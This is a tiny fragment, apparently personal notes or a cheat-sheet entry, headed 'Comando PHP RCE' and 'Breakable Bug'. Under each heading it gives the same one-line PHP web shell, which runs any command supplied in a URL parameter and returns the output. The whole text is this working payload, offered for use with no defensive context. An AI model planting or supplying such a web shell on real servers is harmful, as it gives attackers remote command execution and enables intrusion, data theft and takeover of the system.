Comando PHP RCE
<?php echo shell_exec($_GET['cmd']); ?>
Breakable Bug
<?php echo shell_exec($_GET['cmd']); ?>